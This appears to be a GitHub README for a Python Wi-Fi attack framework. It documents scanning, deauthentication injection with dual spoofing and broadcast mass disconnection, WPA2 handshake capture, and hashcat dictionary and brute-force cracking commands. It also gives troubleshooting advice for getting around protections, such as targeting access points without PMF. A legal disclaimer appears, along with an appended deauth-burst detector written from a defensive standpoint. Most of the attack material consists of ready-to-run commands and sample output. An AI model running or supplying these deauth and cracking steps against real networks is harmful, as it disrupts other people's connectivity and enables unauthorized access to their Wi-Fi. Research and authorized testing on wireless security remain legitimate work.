Enterprise-Grade Wireless Network Security Assessment Platform
Zero Shell Dependencies • Real-Time Packet Processing • Kernel Watchdog
Thread-Safe Operations • Autonomous Recovery • Memory-Safe
- Overview
- Features
- Architecture
- Requirements
- Installation
- Quick Start
- Usage Examples
- Advanced Features
- Project Structure
- Technical Details
- Troubleshooting
- Contributing
- Legal Disclaimer
- License
- Credits
This framework provides a complete wireless security assessment toolkit that combines passive reconnaissance, real-time packet capture, deauthentication attacks, and WPA/WPA2 handshake capture in a single, cohesive pipeline. Built with enterprise reliability in mind, it features autonomous driver recovery, thread-safe operations, and comprehensive error handling.
- Zero Shell Dependencies: Direct kernel interaction via `pyroute2` RTNL/nl80211 APIs (no `iw`, `airmon-ng`, `ifconfig`)
- Real-Time Packet Processing: Scapy `AsyncSniffer` with in-process 802.11 frame parsing (no CSV files, no airodump-ng)
- Kernel Watchdog: Autonomous driver panic detection and recovery via debugfs + RTNL event monitoring
- Production-Ready: Thread-safe, memory-leak-free, with graceful degradation on hardware failures
- Offensive Capabilities: Precision deauthentication with dual-spoofing + EAPOL handshake capture

- Real-Time AP Discovery: Live 802.11 beacon/probe response parsing
- Detailed Network Intelligence: BSSID, ESSID, channel, encryption (WPA2/WPA3/WEP/OPEN), signal strength, frequency
- Hidden Network Detection: Captures networks without broadcast SSID
- Concurrent Monitoring: Non-blocking capture with progress updates

- Precision Deauthentication: Dual-spoofing (AP→Client + Client→AP) to bypass basic protections
- Broadcast Targeting: Mass disconnection mode (`FF:FF:FF:FF:FF:FF`)
- EAPOL Handshake Capture: Real-time 4-way handshake extraction with incremental `.pcap` writing
- Crash-Resilient: Survives driver resets mid-capture (sync flush after every frame)
- Auto-Target Selection: Strongest encrypted AP or explicit BSSID targeting

- Kernel Watchdog: Monitors debugfs counters + RTNL link events → auto-recovery via `modprobe -r`/`modprobe`
- Thread-Safe Logging: Double-checked locking, session-scoped file handlers, DEBUG + INFO streams
- Process Group Management: `start_new_session=True` + `killpg` for clean termination
- Graceful Cleanup: Interface restoration even on `KeyboardInterrupt` or crashes
```
┌───────────────────────────────────────────────────────────────────┐
│                     main.py (CLI Entry Point)                     │
│                      argparse + orchestrator                      │
└─────────────────────────────────┬─────────────────────────────────┘
                                  │
                                  ▼
┌───────────────────────────────────────────────────────────────────┐
│                  core/orchestrator.py (Pipeline)                  │
│ ┌───────────────────────────────────────────────────────────────┐ │
│ │ Phase 1: Observability → kernel_watchdog.start()              │ │
│ │ Phase 2: Control Plane → netlink_ctrl.enable_monitor_mode()   │ │
│ │ Phase 3: Data Plane    → capture_engine.stream()              │ │
│ │ Phase 4: Offensive     → injector + eapol_capture             │ │
│ │ Cleanup: Restore       → netlink_ctrl.disable_monitor_mode()  │ │
│ └───────────────────────────────────────────────────────────────┘ │
└─────────────────────────────────┬─────────────────────────────────┘
                                  │
               ┌──────────────────┼───────────────────┐
               ▼                  ▼                   ▼
       ┌──────────────┐ ┌──────────────────┐ ┌─────────────────┐
       │ netlink_ctrl │ │ capture_engine   │ │ kernel_watchdog │
       │ (pyroute2)   │ │ (Scapy)          │ │ (debugfs/RTNL)  │
       ├──────────────┤ ├──────────────────┤ ├─────────────────┤
       │ • RTNL link  │ │ • AsyncSniffer   │ │ • DebugFS poll  │
       │ • nl80211    │ │ • 802.11 parser  │ │ • RTNL monitor  │
       │ • iftype set │ │ • AP extraction  │ │ • Auto-recovery │
       └──────────────┘ └──────────────────┘ └─────────────────┘
                                  │
               ┌──────────────────┼───────────────────┐
               ▼                  ▼                   ▼
       ┌──────────────┐ ┌──────────────────┐ ┌─────────────────┐
       │ injector     │ │ eapol_capture    │ │ logger          │
       │ (Deauth Tx)  │ │ (Handshake Rx)   │ │ (Thread-safe)   │
       ├──────────────┤ ├──────────────────┤ ├─────────────────┤
       │ • Dual-spoof │ │ • BPF filter     │ │ • Session file  │
       │ • Broadcast  │ │ • PcapWriter     │ │ • Console INFO  │
       │ • Tx pacing  │ │ • sync=True      │ │ • DEBUG to disk │
       └──────────────┘ └──────────────────┘ └─────────────────┘
```
- Observability Start: Kernel watchdog spawns daemon threads (debugfs + RTNL monitoring)
- Monitor Mode Transition: RTNL/nl80211 sets interface type to `monitor` + brings link up
- AP Discovery: AsyncSniffer captures beacons/probe responses → real-time parsing
- Offensive Operations (optional): Deauth injection + EAPOL handshake capture with Tx/Rx synchronization
- Cleanup: Restore interface to `managed` mode, stop watchdog, flush logs

| Component | Requirement |
|---|---|
| OS | Linux (kernel ≥ 4.4) |
| Python | 3.10 or higher |
| Privileges | Root / sudo (hardware operations) |
| Driver Stack | mac80211 (monitor mode support) |
Your Wi-Fi adapter must support true monitor mode (ARPHRD_IEEE80211_RADIOTAP).
Verify monitor mode capability:
```bash
sudo iw dev wlan0 set type monitor
iw dev wlan0 info | grep type # Should show "monitor"
```

| Driver | Chipsets | Injection Support |
|---|---|---|
| ath9k | AR9271, AR9280, AR9285, AR9287 | Excellent |
| ath10k | QCA9377, QCA6174, QCA9887 | Good |
| mt76 | MT7612U, MT7610U, MT7921 | Good |
| rtw88 | RTL8822BE, RTL8821CE | |
| rtl8812au | RTL8812AU, RTL8814AU (DKMS) | Excellent |

Note: Realtek USB adapters (rtl88xx) often require out-of-tree drivers. See Aircrack-ng compatibility list.
```bash
# Core dependencies
pip install pyroute2 scapy
# Optional (for development)
pip install pytest black mypy
```

```bash
# Debian / Ubuntu / Kali Linux
sudo apt update
sudo apt install iw iproute2 python3-pip
# Arch Linux
sudo pacman -S iw iproute2 python-pip
# Fedora / RHEL
sudo dnf install iw iproute python3-pip
```

Note: `aircrack-ng` is not required for core functionality but useful for post-capture analysis.
```bash
# 1. Clone the repository
git clone https://github.com/AliAkgun0/wifi-security-framework
cd wifi-security-framework
# 2. Install Python dependencies
pip3 install -r requirements.txt
# 3. Verify installation
sudo python3 main.py --help
```

```bash
# Create isolated Python environment
python3 -m venv .venv
source .venv/bin/activate
# Install dependencies
pip install -r requirements.txt
# Verify
python3 main.py --help
```

```bash
# 1. Verify root access
sudo whoami # Should print "root"
# 2. Check rfkill status
rfkill list all
# If "Soft blocked: yes" → Run: rfkill unblock wifi
# If "Hard blocked: yes" → Enable Wi-Fi via hardware switch/BIOS
# 3. Verify monitor mode support
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
iw dev wlan0 info # type: monitor
# 4. Restore to managed mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up
```

For ath9k/ath10k chipsets, disable hardware encryption:

```bash
echo "options ath9k nohwcrypt=1" | sudo tee /etc/modprobe.d/ath9k.conf
sudo modprobe -r ath9k
sudo modprobe ath9k
```

```bash
# Scan for Wi-Fi networks (15 seconds)
sudo python3 main.py wlan0
# Custom scan duration
sudo python3 main.py wlan0 --scan-time 30
```

```bash
# Auto-target strongest encrypted AP
sudo python3 main.py wlan0 --exploit
# Target specific BSSID
sudo python3 main.py wlan0 --exploit --target AA:BB:CC:DD:EE:FF
# Advanced parameters
sudo python3 main.py wlan0 --exploit --target AA:BB:CC:DD:EE:FF --deauth-count 128 --handshake-timeout 45
```

```bash
sudo python3 main.py wlan0 --scan-time 30
```

Output:

```
[INFO] AP | bssid=AA:BB:CC:DD:EE:FF ch=6 enc=WPA2 rssi=-42 dBm essid=HomeNetwork
[INFO] AP | bssid=11:22:33:44:55:66 ch=11 enc=WPA3-SAE rssi=-58 dBm essid=Neighbor5G
[INFO] Discovery complete - 2 access point(s) found
```

```bash
sudo python3 main.py wlan0 --exploit --target AA:BB:CC:DD:EE:FF
```

Output:

```
[Phase 4] Starting EAPOL capture (pre-injection)
[Phase 4] Launching deauth injection burst
[Phase 4] Injection complete | frames=128 duration=6.40s
[Phase 4] EAPOL frame captured | total=4
[Phase 4] SUCCESS | Handshake captured | pcap=./reports/handshake_AABBCCDDEEFF_20260608_211543.pcap
```

```bash
# Convert PCAP to hashcat format
hcxpcapngtool -o hash.hc22000 reports/handshake_*.pcap
# Dictionary attack
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
# Brute force
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
```

Monitors driver health via debugfs + RTNL link events. Auto-recovers on:
- Tx queue stuck
- Hardware scan timeout
- Interface down events
```bash
# Enable watchdog (default)
sudo python3 main.py wlan0 --exploit
# Disable watchdog (debugging only)
sudo python3 main.py wlan0 --exploit --no-watchdog
```

```bash
# Test injection only
sudo python3 test_offensive.py --mode inject --iface wlan0mon --target AA:BB:CC:DD:EE:FF
# Test EAPOL capture only
sudo python3 test_offensive.py --mode capture --iface wlan0mon --target AA:BB:CC:DD:EE:FF
# Test full exploit cycle
sudo python3 test_offensive.py --mode exploit --iface wlan0mon --target AA:BB:CC:DD:EE:FF
```

```
wifi-security-framework/
├── main.py                  # CLI entry point (argparse)
├── test_offensive.py        # Standalone test harness
├── requirements.txt         # Python dependencies
├── LICENSE                  # Educational & Authorized Testing License
│
├── core/                    # Core modules
│   ├── orchestrator.py      # Pipeline coordinator (4 phases)
│   ├── netlink_ctrl.py      # RTNL/nl80211 interface control
│   ├── capture_engine.py    # Scapy AsyncSniffer + 802.11 parser
│   ├── kernel_watchdog.py   # DebugFS/RTNL health monitor
│   ├── injector.py          # Deauth packet forging (Scapy)
│   ├── eapol_capture.py     # WPA handshake capture
│   ├── executor.py          # Subprocess manager (legacy)
│   ├── parser.py            # IPC protocol parser (legacy)
│   └── logger.py            # Thread-safe logging factory
│
├── modules/                 # Legacy BASH wrappers (compatibility)
│   ├── monitor_mode.sh      # Calls netlink_ctrl
│   ├── discovery.sh         # Calls capture_engine
│   └── cleanup.sh           # Calls netlink_ctrl
│
├── logs/                    # Session logs (auto-created)
└── reports/                 # Captured handshakes (auto-created)
```

- Logger: Double-checked locking on handler creation
- Injector: Internal lock serializes `sendp()` calls
- EAPOL Capture: PcapWriter lock prevents race conditions
- AsyncSniffer: `store=False` prevents memory leaks

```
t=0s    → EAPOL capture starts (background thread)
t=2s    → Sniffer ready (grace period)
t=2s    → Deauth injection begins
t=8s    → Injection complete (128 frames @ 0.1s interval)
t=8-38s → Handshake capture window (30s timeout)
t=38s   → EAPOL capture stops, pcap flushed
```

- Tx Queue Protection: Minimum 0.1s inter-frame interval
- Crash Recovery: Watchdog detects panics → `modprobe -r`/`modprobe`
- Data Durability: `PcapWriter(sync=True)` → immediate disk flush

- `AsyncSniffer(store=False)` → no packet accumulation
- Generator-based streaming → constant memory usage
- Daemon threads → auto-cleanup on exit
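
From the monitoring side, the injection pattern described above (a burst of deauthentication frames at sub-second spacing, spoofed in both directions) is straightforward to flag. The following is an added example, not code from this project: a standard-library-only detector run over constructed radiotap frames, where the threshold, window, function names and sample addresses are assumptions.

```python
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def parse_deauth(raw: bytes):
    """Return (dst, src, bssid, reason) if raw is radiotap + 802.11 deauth, else None."""
    if len(raw) < 4:
        return None
    rt_len = struct.unpack_from("<H", raw, 2)[0]      # radiotap it_len (little-endian)
    dot11 = raw[rt_len:]
    if len(dot11) < 26:                               # 24-byte header + 2-byte reason code
        return None
    ftype, subtype = (dot11[0] >> 2) & 0x3, dot11[0] >> 4
    if ftype != 0 or subtype != 12:                   # management frame, subtype 12 = deauth
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    reason = struct.unpack_from("<H", dot11, 24)[0]
    return mac(dot11[4:10]), mac(dot11[10:16]), mac(dot11[16:22]), reason

def detect_bursts(records, threshold=20, window=5.0):
    """records: time-ordered (timestamp, raw_frame). One alert per BSSID whose
    deauth count reaches `threshold` inside a sliding `window` (seconds)."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in records:
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        dst, src, bssid, _reason = parsed
        q = recent[bssid]
        q.append((ts, dst, src))
        while ts - q[0][0] > window:                  # drop frames older than the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerts:
            alerts[bssid] = {
                "bssid": bssid, "start": q[0][0], "frames": len(q),
                "broadcast": any(d == BROADCAST for _, d, _ in q),
                # frames claiming to come from both the AP and a client
                "both_directions": {s == bssid for _, _, s in q} == {True, False},
            }
    return list(alerts.values())

def _frame(dst, src, bssid, subtype=12, reason=7):
    """Constructed sample frame: 8-byte radiotap header + 802.11 management frame."""
    hx = lambda m: bytes.fromhex(m.replace(":", ""))
    fc = bytes([subtype << 4, 0])
    return (struct.pack("<BBHI", 0, 0, 8, 0) + fc + b"\x00\x00"
            + hx(dst) + hx(src) + hx(bssid) + b"\x00\x00" + struct.pack("<H", reason))

# Constructed capture: 30 deauths at 0.1 s spacing in alternating directions,
# plus one beacon and one isolated deauth from an unrelated BSSID.
AP, STA, OTHER = "aa:bb:cc:dd:ee:ff", "02:00:00:00:00:01", "11:22:33:44:55:66"
SAMPLE = [(i * 0.1, _frame(STA, AP, AP) if i % 2 == 0 else _frame(AP, STA, AP))
          for i in range(30)]
SAMPLE += [(1.0, _frame(BROADCAST, OTHER, OTHER, subtype=8)), (2.0, _frame(STA, OTHER, OTHER))]
SAMPLE.sort(key=lambda r: r[0])
```

Only the burst against the first BSSID raises an alert; the isolated deauth and the beacon from the second BSSID do not.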
Possible Causes:
- No active clients on target AP
  ```bash
  # Verify clients exist before attacking
  sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF --channel 6
  ```
- WPA3-SAE only network (no WPA2 fallback)
  - This tool captures WPA2 4-way handshakes only
  - WPA3-SAE uses different authentication frames
- PMF (Protected Management Frames) enabled
  - Deauth attacks are blocked by IEEE 802.11w
  - Try targeting older APs without PMF
- Injection not working
  ```bash
  # Test injection capability
  sudo aireplay-ng --test wlan0mon
  ```

```bash
# Check if interface exists
ip link show wlan0
# Check if already in use
sudo airmon-ng check kill # Stops conflicting processes
# Manual monitor mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
```

```bash
# Verify root access
sudo whoami # Must output "root"
# Run with sudo
sudo python3 main.py wlan0 --exploit
# Or switch to root shell
sudo -i
cd /path/to/wifi-security-framework
python3 main.py wlan0 --exploit
```

This is expected behavior. The watchdog reloads the driver (`modprobe -r`/`modprobe`), which recreates the interface. The framework handles this automatically.

For ath9k:

```bash
echo "options ath9k nohwcrypt=1" | sudo tee /etc/modprobe.d/ath9k.conf
sudo modprobe -r ath9k && sudo modprobe ath9k
```

For rtl88xx:
- Reduce `--deauth-count` to 32
- Increase interval (code modification required)

Improvements:
- Stronger signal: Move closer to AP (target RSSI > -60 dBm)
- More deauth frames: `--deauth-count 128`
- Longer timeout: `--handshake-timeout 45.0`
- Verify active clients: Use `airodump-ng` to confirm client presence
- Check channel: Ensure interface is on correct channel

Contributions are welcome! Please follow these guidelines:
Open an issue with:
- OS & kernel version: `uname -a`
- Wi-Fi chipset: `lspci | grep -i wireless` or `lsusb | grep -i wireless`
- Driver: `lsmod | grep -E "ath|rtw|mt76"`
- Full error log: Attach `logs/*_session.log`

- Fork the repository
- Create a feature branch: `git checkout -b feature/amazing-feature`
- Follow existing code style (PEP 8, type hints)
- Add tests if applicable
- Update documentation
- Submit PR with detailed description

```bash
# Install dev dependencies
pip install -r requirements-dev.txt # (if exists)
# Run tests
pytest tests/
# Code formatting
black core/ main.py test_offensive.py
# Type checking
mypy core/ main.py
```

This framework is designed exclusively for:

| PERMITTED USES |
|---|
| Educational purposes in controlled lab environments |
| Security research on networks you own or control |
| Authorized penetration testing with explicit written permission |
| CTF competitions and authorized security challenges |
| Professional security services using the tool internally for authorized assessments |

| PROHIBITED ACTIVITIES |
|---|
| Testing networks without explicit written authorization |
| Intercepting communications you are not authorized to access |
| Disrupting network services without permission |
| Any activity violating local, state, federal, or international laws |
| Selling, licensing, or commercially distributing this software |

Unauthorized use may violate:

| Jurisdiction | Law |
|---|---|
| United States | Computer Fraud and Abuse Act (CFAA) 18 U.S.C. § 1030 |
| European Union | Directive 2013/40/EU (Attacks against information systems) |
| United Kingdom | Computer Misuse Act 1990 |
| International | Council of Europe Convention on Cybercrime (Budapest Convention) |

Violation of these laws can result in:
- Criminal prosecution and felony charges
- Civil liability and substantial damages
- Imprisonment (up to 20+ years in severe cases)
- Substantial fines and penalties
- Permanent criminal record

Before using this tool, you MUST:
- Obtain Written Authorization: Explicit written permission from the network/system owner
- Define Scope of Engagement: Clear documentation of what can and cannot be tested
- Document All Activities: Maintain detailed logs for accountability
- Follow Professional Standards: Adhere to PTES, OWASP, NIST guidelines
- Practice Responsible Disclosure: Report findings through proper channels

YOU ASSUME ALL LEGAL RESPONSIBILITY. The authors and contributors:
- Do NOT authorize illegal or unauthorized use
- Are NOT LIABLE for any misuse of this software
- Provide this tool "AS IS" without any warranty
By using this software, you acknowledge that you have read and understood the LICENSE file and agree to be bound by its terms.
This project is licensed under the Educational and Authorized Security Testing License.
| Permission | Status | Notes |
|---|---|---|
| Educational Use | ✅ | Academic, training, personal learning |
| Professional Penetration Testing | ✅ | As an internal tool with written authorization |
| Security Research | ✅ | On systems you own or have permission to test |
| CTF Competitions | ✅ | Authorized security challenges |
| Studying & Modifying Code | ✅ | For learning and improvement |
| Commercial Distribution | ❌ | Selling, licensing, or product integration prohibited |
| Unauthorized Access | ❌ | Illegal and strictly prohibited |
| Malicious Use | ❌ | Criminal activity prohibited |

You MAY:
- Use this tool as part of professional penetration testing services (when properly authorized)
- Deliver security assessment reports to clients using findings from this tool
- Earn revenue from security services where this tool is used internally
You MAY NOT:
- Sell or license the software itself to clients or third parties
- Incorporate the software into commercial products or services
- Distribute the software as part of SaaS/PaaS offerings
- Provide the software to clients for their direct use
The distinction: You're selling your expertise and deliverables, not the software itself.
The complete license terms can be found in the LICENSE file.
Key sections include:
- Detailed definitions of permitted and prohibited uses
- Professional security services clarifications
- Warranty disclaimers and liability limitations
- User obligations and indemnification
- Export compliance and jurisdiction provisions
For commercial licensing inquiries or questions about permitted uses, please contact the copyright holders.

aircrack-ng • wifite2 • bettercap
- Kali Linux team for maintaining security testing tools
- mac80211 kernel developers
- Open-source security community

If this project helped you, consider giving it a star on GitHub!
Built with ❤️ for the security research community
Remember: With great power comes great responsibility.